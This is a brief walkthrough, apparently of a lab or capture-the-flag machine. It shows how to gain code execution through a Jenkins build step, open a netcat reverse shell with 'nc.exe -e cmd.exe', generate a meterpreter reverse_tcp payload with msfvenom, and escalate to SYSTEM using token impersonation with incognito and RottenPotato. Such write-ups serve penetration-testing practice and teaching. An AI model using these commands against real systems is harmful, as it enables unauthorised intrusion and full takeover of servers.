Code Execution
Create a project on Jenkins
Low Privileged Shell
Enter commands under Build Section
Powershell wget “” -outfile “nc.exe”
Nc.exe 7777 -e cmd.exe
And listened on python SimpleHTTPServer to send the nc.exe file and started to listen on port 7777 with nc for a reverse shell
Meterpreter Shell
Create a shell with the following command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Upload the executable file as shell.exe
And listen on metasploit
Privilege Escalation
I checked with whoami/priv command and saw that SeImpersonatePrivilege is enabled
I first loaded incognito with the command load incognito on meterpreter
list tokens and you’ll see no token available.
Upload rottenpotato.exe and execute the file
list tokens again and you’ll see administrator token now
Now impersonate the token and become NT AUTHORITY\SYSTEM